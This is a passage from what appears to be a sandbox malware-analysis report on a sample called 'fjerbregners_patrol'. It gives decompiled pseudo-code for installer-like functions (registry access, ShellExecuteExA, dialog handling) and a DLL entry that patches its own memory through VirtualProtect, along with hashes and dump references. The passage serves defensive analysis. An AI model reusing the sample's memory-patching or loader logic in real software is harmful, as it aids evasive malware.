                                                                                                                                                                                            • Opcode ID: 6960c56175d9aafb3b29865a352418fdb96d86ff17cbd66b50333d486b345b90
                                                                                                                                                                                            • Instruction ID: d2716b4e154176654482754b4a4f57323ab55d8c6637b6fd874fd7a1d02b25b7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6960c56175d9aafb3b29865a352418fdb96d86ff17cbd66b50333d486b345b90
                                                                                                                                                                                            • Instruction Fuzzy Hash: 15E0BF7201020ABEEF055F50DD0ADBB3A2DEB08210F01452AB91695091E6B5AD305664
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE819C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6ee85014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6ee8501c, 4, 0x40, 0x6ee85034); // executed
					 *0x6ee8501c = 0xc2;
					 *0x6ee85034 = 0;
					 *0x6ee85030 = 0;
					 *0x6ee8502c = 0;
					 *0x6ee85028 = 0;
					 *0x6ee85024 = 0;
					 *0x6ee85020 = 0;
					 *0x6ee8501e = 0;
				}
				return 1;
			}



                                                                                                                                                                                            0x6ee819d0
                                                                                                                                                                                            0x6ee819d5
                                                                                                                                                                                            0x6ee819e5
                                                                                                                                                                                            0x6ee819ed
                                                                                                                                                                                            0x6ee819f4
                                                                                                                                                                                            0x6ee819fa
                                                                                                                                                                                            0x6ee81a00
                                                                                                                                                                                            0x6ee81a06
                                                                                                                                                                                            0x6ee81a0c
                                                                                                                                                                                            0x6ee81a12
                                                                                                                                                                                            0x6ee81a18
                                                                                                                                                                                            0x6ee81a18
                                                                                                                                                                                            0x6ee81a21

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • VirtualProtect.KERNELBASE(6EE8501C,00000004,00000040,6EE85034), ref: 6EE819E5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                            • Opcode ID: 0f568203c821781c52e57e39a625ec5ff5df0d13fe6a623de4dbb4fd15d58db6
                                                                                                                                                                                            • Instruction ID: 9f67c01782a36a7475315af7095fc1a80ba648232b11fdf88bcdfb51faba152b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f568203c821781c52e57e39a625ec5ff5df0d13fe6a623de4dbb4fd15d58db6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0A5B4969B40DECB198F68954460B3EE0B71B344B10492EF24BDE358CB304109AB9E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040614A Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E0040614A(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00405FCC(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                                                                                                                            0x00406154
                                                                                                                                                                                            0x0040615b
                                                                                                                                                                                            0x0040616e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040616e
                                                                                                                                                                                            0x0040615f
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400,00000000,?,004067A4,00000400,?,?,000203D0,Call,?,?), ref: 0040616E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                                            • Opcode ID: f93216e26e4b5cbc88d93a17ab61893ce428fb9cf933fa418bea21b24ba7b136
                                                                                                                                                                                            • Instruction ID: 322d4d8cfbf506dc7dbf7406ed50fabb80eac50bd0388c091d6136aa3259e3ea
                                                                                                                                                                                            • Opcode Fuzzy Hash: f93216e26e4b5cbc88d93a17ab61893ce428fb9cf933fa418bea21b24ba7b136
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DD0123200020EBBDF115FA09D01FAB3B6DEB08310F004426FE16A8092D775D930AB64
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004053D7 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004053D7(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4237dc; // 0x303f6
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                                                                                            0x004053d7
                                                                                                                                                                                            0x004053de
                                                                                                                                                                                            0x004053e9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004053e9
                                                                                                                                                                                            0x004053ef

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SendMessageA.USER32(000303F6,00000000,00000000,00000000), ref: 004053E9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                            • Opcode ID: 69d40cb706eb7db9e746868a2e7cc43143a358c919d46c550bf4611d342b7b44
                                                                                                                                                                                            • Instruction ID: 2189bd3df5aacbfcbfee6ac4b2376a9be646f799957d66e2a14e9470ba931498
                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d40cb706eb7db9e746868a2e7cc43143a358c919d46c550bf4611d342b7b44
                                                                                                                                                                                            • Instruction Fuzzy Hash: F8C04CB17407016BDA208B619D45F0776A4E750742F50C429B641E51E4C6B4E410CA2C
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00402F40 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00402F40(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a010, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                                                            0x00402f4e
                                                                                                                                                                                            0x00402f54

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004034D8,?), ref: 00402F4E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                            • Opcode ID: 6840ce3c9e1d8f502c1c59a726beee96ff429b96c3a756e0cc7e880b863284f8
                                                                                                                                                                                            • Instruction ID: 6676b4682d1b1505b733c47c67c1370fa0461ed9fa78b3ce244d4aa898b8dae2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6840ce3c9e1d8f502c1c59a726beee96ff429b96c3a756e0cc7e880b863284f8
                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B09231540200AADA214F009E0AF057A21BB94700F208824B2A0280F086711060EA0D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004067EE Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004067EE(struct _SHELLEXECUTEINFOA* _a4) {
				struct _SHELLEXECUTEINFOA* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExA(_t4); // executed
				return _t5;
			}





                                                                                                                                                                                            0x004067ee
                                                                                                                                                                                            0x004067f3
                                                                                                                                                                                            0x004067f7
                                                                                                                                                                                            0x004067fd
                                                                                                                                                                                            0x00406803

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ShellExecuteExA.SHELL32(?,004020A0,?), ref: 004067FD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExecuteShell
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 587946157-0
                                                                                                                                                                                            • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                                                                                                            • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                                                                                                                                                                            • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004053F2 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004053F2(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x4237f8, 0x28, _a4, "true"); // executed
				return _t2;
			}




                                                                                                                                                                                            0x00405400
                                                                                                                                                                                            0x00405406

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SendMessageA.USER32(00000028,?,?,00405229), ref: 00405400
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                            • Opcode ID: ab32d43468ec48de7b9d411d6e56c85779efaca232b0d60756a3416a3cf73d34
                                                                                                                                                                                            • Instruction ID: e77a4c4343ffdc38ffa6a7acbd267e7fe00488b89e6cfdd8b44347da305ab929
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab32d43468ec48de7b9d411d6e56c85779efaca232b0d60756a3416a3cf73d34
                                                                                                                                                                                            • Instruction Fuzzy Hash: B5B092B5280A01BADE614B00DE0AF497AA2F7A4702F119028B340240B0CAB200A1DB18
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 0040432F Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 560windowmemoryCOMMONCrypto
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                            			E0040432F(struct HWND__* _a4, signed int _a8, long _a12, signed int _a16) {
				struct HWND__* _v0;
				signed int* _v40;
				void* _v44;
				signed int _v48;
				long _v52;
				void* _v56;
				signed int _v60;
				int _v64;
				struct HWND__* _v68;
				struct HWND__* _v72;
				void* _v76;
				struct HWND__* _v80;
				void* _v84;
				struct HWND__* _v88;
				intOrPtr _v96;
				void* _v100;
				void* _v104;
				struct HWND__* _v108;
				signed int _t158;
				signed int _t159;
				int _t161;
				void* _t168;
				intOrPtr _t170;
				void* _t171;
				long _t176;
				void* _t198;
				void* _t199;
				int _t207;
				intOrPtr _t212;
				signed int _t213;
				signed int _t214;
				void* _t232;
				void* _t234;
				intOrPtr _t240;
				intOrPtr _t248;
				long _t252;
				void* _t258;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				long _t272;
				long _t273;
				int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t280;
				int _t285;
				signed int _t288;
				signed int _t293;
				void* _t294;
				void* _t297;
				signed int _t298;
				long _t302;
				struct HWND__* _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t310;
				struct HWND__* _t311;
				int _t316;
				struct HWND__* _t317;
				char* _t319;
				struct HWND__* _t320;
				signed int _t323;
				int _t324;
				int _t326;
				long _t327;
				intOrPtr _t328;
				signed int* _t329;
				struct HWND__* _t331;
				long _t332;
				void* _t333;
				long _t334;
				signed int _t335;
				struct HWND__* _t336;
				int _t337;
				int _t338;
				void* _t339;
				struct HWND__* _t340;
				struct HWND__* _t342;
				struct HWND__** _t343;

				_t343 =  &_v80;
				_t320 = _a4;
				_v68 = GetDlgItem(_t320, 0x3f9);
				_t336 = GetDlgItem(_t320, 0x408);
				_v72 =  *0x424028;
				_v80 = _t336;
				_v64 =  *0x424010;
				if(_a8 != 0x110) {
					L23:
					_t275 =  !=  ? _a8 : 0x40f;
					_v60 = 0x40f;
					_t158 =  !=  ? _a12 : 0;
					_a12 = _t158;
					_t323 =  !=  ? _a16 : 1;
					if(0x40f == 0x4e) {
						L25:
						if(_t275 == 0x413) {
							L27:
							_t310 = _t323;
							_t268 = _t158;
							_t337 = _t275;
							if(( *0x42400c & 0x00000200) == 0 && (_t275 == 0x413 ||  *((intOrPtr*)(_t323 + 8)) == 0xfffffffe)) {
								_t304 = E0040555F(_v80, 0 | _t275 != 0x413);
								_t310 = _t323;
								_a8 = _t304;
								_t268 = _a4;
								_t337 = _v68;
								if(_t304 >= 0) {
									_t305 = _t304 * 0x418;
									_a8 = _t305;
									_t306 =  *(_t305 + _v72 + 8);
									_t310 = _t323;
									if((_t306 & 0x00000010) == 0) {
										if((_t306 & 0x00000040) == 0) {
											_t307 = _t306 ^ 1;
										} else {
											_t307 =  ==  ? (_t306 ^ 0x00000080) & 0xfffffffe : _t306 ^ 0x00000080 | 0x00000001;
										}
										_t271 = _a16;
										 *(_a8 + _v72 + 8) = _t307;
										E00401221(_t271);
										_t268 = _t271 + 1;
										_t310 =  !( *0x42400c >> 8) & 1;
										_t337 = 0x40f;
									}
								}
							}
							if(_t323 != 0) {
								_t212 =  *((intOrPtr*)(_t323 + 8));
								if(_t212 == 0xfffffe6e) {
									SendMessageA(_v80, 0x419, 0,  *(_t323 + 0x5c));
									_t212 =  *((intOrPtr*)(_t323 + 8));
								}
								if(_t212 == 0xfffffe6a) {
									_t288 =  *(_t323 + 0x5c) * 0x418;
									_t303 = _v72;
									_t213 =  *(_t288 + _t303 + 8);
									if( *((intOrPtr*)(_t323 + 0xc)) != 2) {
										_t214 = _t213 & 0xffffffdf;
									} else {
										_t214 = _t213 | 0x00000020;
									}
									 *(_t288 + _t303 + 8) = _t214;
								}
							}
							L44:
							_t159 = _t268;
							_t276 = _t310;
							_a16 = _t159;
							_t324 = _t337;
							_a8 = _t276;
							_t297 = 8;
							if(_t337 != 0x111) {
								_t268 = _t159;
								_t310 = _t276;
								_t338 = _t324;
								if(_t324 != 0x200) {
									_t161 = _t338;
									if(_t338 != 0x40b) {
										_a8 = _t276;
										_t338 = _t161;
										_v60 = _t268;
										_a16 = _t338;
										if(_t161 != 0x40f) {
											L87:
											if(_t338 == 0x420 && ( *0x42400c & 0x00000100) != 0) {
												_t326 =  ==  ? _t297 : 0;
												ShowWindow(_v80, _t326);
												ShowWindow(GetDlgItem(_a4, 0x3fe), _t326);
											}
											L90:
											return E004055E0(_t338, _t268, _t310);
										}
										_t327 = 0;
										L62:
										E004012DD(_t327, _t327);
										if(_t268 != 0) {
											_t196 =  ==  ? _t268 : _t268 - 1;
											_push( ==  ? _t268 : _t268 - 1);
											_push(8);
											E004053A5();
										}
										if(_t310 == 0) {
											L70:
											E004012DD(_t327, _t327);
											_t277 =  *0x42402c;
											_t168 =  *0x420e04; // 0x0
											_a4 = _t327;
											_t328 =  *0x424028;
											_v52 = 0xf030;
											if(_t277 <= 0) {
												L82:
												if( *0x4240fe == 0x400) {
													InvalidateRect(_v80, 0, 1);
												}
												_t170 =  *0x4237e0; // 0x5527aa
												if( *((intOrPtr*)(_t170 + 0x10)) != 0) {
													_t171 = E004056BA(5);
													_push(0);
													E0040544F(_t277, 0x3ff, 0xfffffffb, _t171);
												}
												_t297 = 8;
												goto L87;
											}
											_t269 = _a12;
											_t329 = _t328 + 8;
											_t311 = _v80;
											_t339 = _t168;
											do {
												_t176 =  *((intOrPtr*)(_t339 + _t269 * 4));
												_a12 = _t176;
												if(_t176 != 0) {
													_t298 =  *_t329;
													_v52 = _t176;
													_v56 = 8;
													if((_t298 & 0x00000100) != 0) {
														_v56 = 9;
														_v40 =  &(_t329[4]);
														 *_t329 =  *_t329 & 0xfffffeff;
														_a12 = _v52;
													}
													if((_t298 & 0x00000040) == 0) {
														_t280 = (_t298 & 1) + 1;
														if((_t298 & 0x00000010) != 0) {
															_t280 = _t280 + 3;
														}
													} else {
														_t280 = 3;
													}
													_v48 = (_t280 << 0x0000000b | _t298 & 0x00000008) + (_t280 << 0x0000000b | _t298 & 0x00000008) | _t298 & 0x00000020;
													SendMessageA(_t311, 0x1102, (_t298 >> 0x00000005 & 1) + 1, _a12);
													SendMessageA(_t311, 0x110d, 0,  &_v56);
													_t277 =  *0x42402c;
												}
												_t269 = _t269 + 1;
												_t329 =  &(_t329[0x106]);
											} while (_t269 < _t277);
											_t310 = _a8;
											_t268 = _v60;
											_t338 = _a16;
											goto L82;
										} else {
											_t310 = E004011A0( *0x420e04);
											_a4 = _t310;
											E00401290(_t310);
											_t285 = _t327;
											_t302 = _t327;
											if(_t310 <= 0) {
												L69:
												SendMessageA(_v68, 0x14e, _t285, _t327);
												_t338 = 0x420;
												_a16 = 0x420;
												goto L70;
											}
											do {
												_t194 =  ==  ? _t285 : _t285 + 1;
												_t302 = _t302 + 1;
												_t285 =  ==  ? _t285 : _t285 + 1;
											} while (_t302 < _t310);
											_t327 = 0;
											goto L69;
										}
									}
									_t198 =  *0x420e08; // 0x0
									if(_t198 != 0) {
										ImageList_Destroy(_t198);
									}
									_t199 =  *0x420e04; // 0x0
									if(_t199 != 0) {
										GlobalFree(_t199);
									}
									 *0x420e08 = 0;
									 *0x420e04 = 0;
									 *0x4240b8 = 0;
									goto L90;
								}
								SendMessageA(_v80, 0x200, 0, 0);
								_t310 = _a8;
								_t268 = _a16;
								goto L90;
							}
							if(_t268 != 0x3f9 || _t268 >> 0x10 != 1) {
								goto L90;
							} else {
								_t331 = _v68;
								_t207 = SendMessageA(_t331, 0x147, 0, 0);
								if(_t207 == 0xffffffff) {
									goto L90;
								}
								_t270 = SendMessageA;
								_t332 = SendMessageA(_t331, 0x150, _t207, 0);
								if(_t332 == 0xffffffff ||  *((intOrPtr*)(_v64 + 0x94 + _t332 * 4)) == 0) {
									_t332 = 0x20;
								}
								E00401290(_t332);
								_t327 = 0;
								SendMessageA(_v0, 0x420, 0, _t332);
								_t268 = _t270 | 0xffffffff;
								_t310 = 0;
								_t338 = 0x40f;
								_v64 = _t268;
								_a4 = 0;
								_a12 = 0x40f;
								goto L62;
							}
						}
						_t310 = _t323;
						_t268 = _t158;
						_t337 = _t275;
						if( *((intOrPtr*)(_t323 + 4)) != 0x408) {
							goto L44;
						}
						goto L27;
					}
					_t310 = 1;
					_t268 = _t158;
					_t337 = 0x40f;
					if(0x40f != 0x413) {
						goto L44;
					}
					goto L25;
				} else {
					_v76 = _v76 & 0x00000000;
					_t316 = 2;
					 *0x4240b8 = _t320;
					 *0x420e04 = GlobalAlloc(0x40,  *0x42402c << 2);
					_t232 = LoadImageA( *0x4237f4, 0x6e, 0, 0, 0, 0);
					 *0x420e00 =  *0x420e00 | 0xffffffff;
					_t333 = _t232;
					 *0x4205fc = SetWindowLongA(_t336, 0xfffffffc, E00405755);
					_t234 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420e08 = _t234;
					ImageList_AddMasked(_t234, _t333, 0xff00ff);
					SendMessageA(_t336, 0x1109, _t316,  *0x420e08);
					if(SendMessageA(_t336, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_t336, 0x111b, 0x10, 0);
					}
					DeleteObject(_t333);
					_t340 = _v72;
					_t334 = 0;
					do {
						_t240 =  *((intOrPtr*)(_v68 + 0x94 + _t334 * 4));
						if(_t240 != 0) {
							_push(_t240);
							_push(0);
							SendMessageA(_t340, 0x151, SendMessageA(_t340, 0x143, 0, E00405D47()), _t334);
							_t264 =  ==  ? _t316 : 0;
							_t316 =  ==  ? _t316 : 0;
						}
						_t334 = _t334 + 1;
					} while (_t334 < 0x21);
					_t272 = _a12;
					_v64 = _t316;
					_push( *((intOrPtr*)(_t272 + 0x30 + _t316 * 4)));
					_push(0x15);
					E00405409(_v0);
					_push( *((intOrPtr*)(_t272 + 0x34 + _t316 * 4)));
					_push(0x16);
					E00405409(_v0);
					_t342 = _v108;
					_t273 = 0;
					_t335 = 0;
					if( *0x42402c <= 0) {
						L18:
						SetWindowLongA(_t342, 0xfffffff0, GetWindowLongA(_t342, 0xfffffff0) & 0xfffffffb);
						goto L19;
					} else {
						_t319 = _t343[6] + 0x18;
						do {
							if( *_t319 == 0) {
								L15:
								_t248 = _v96;
								goto L16;
							}
							_t293 = 0x20;
							_v76 = _t273;
							_v72 = 0xffff0002;
							_v68 = 0xd;
							_v56 = _t293;
							_t343[0x15] = _t335;
							_v52 = _t319;
							_v60 =  *(_t319 - 0x10) & _t293;
							if(( *(_t319 - 0x10) & 0x00000002) == 0) {
								if(( *(_t319 - 0x10) & 0x00000004) == 0) {
									_t252 = SendMessageA(_t342, 0x1100, 0,  &_v76);
									_t294 =  *0x420e04; // 0x0
									 *(_t294 + _t335 * 4) = _t252;
								} else {
									_t273 = SendMessageA(_t342, 0x110a, 3, _t273);
								}
								goto L15;
							} else {
								_v68 = 0x4d;
								_t343[0x14] = 1;
								_t273 = SendMessageA(_t342, 0x1100, 0,  &_v76);
								_t258 =  *0x420e04; // 0x0
								 *(_t258 + _t335 * 4) = _t273;
								_t248 = 1;
								_v96 = 1;
							}
							L16:
							_t335 = _t335 + 1;
							_t319 = _t319 + 0x418;
						} while (_t335 <  *0x42402c);
						if(_t248 != 0) {
							L19:
							if(_v80 != 0) {
								_push(_t342);
							} else {
								_t317 = _v88;
								ShowWindow(_t317, 5);
								_push(_t317);
							}
							E004053F2();
							goto L23;
						}
						goto L18;
					}
				}
			}






















































































                                                                                                                                                                                            0x0040432f
                                                                                                                                                                                            0x00404340
                                                                                                                                                                                            0x0040434f
                                                                                                                                                                                            0x0040435d
                                                                                                                                                                                            0x0040436a
                                                                                                                                                                                            0x00404373
                                                                                                                                                                                            0x00404377
                                                                                                                                                                                            0x0040437b
                                                                                                                                                                                            0x0040459e
                                                                                                                                                                                            0x004045aa
                                                                                                                                                                                            0x004045b5
                                                                                                                                                                                            0x004045b9
                                                                                                                                                                                            0x004045c1
                                                                                                                                                                                            0x004045c9
                                                                                                                                                                                            0x004045d4
                                                                                                                                                                                            0x004045e4
                                                                                                                                                                                            0x004045e6
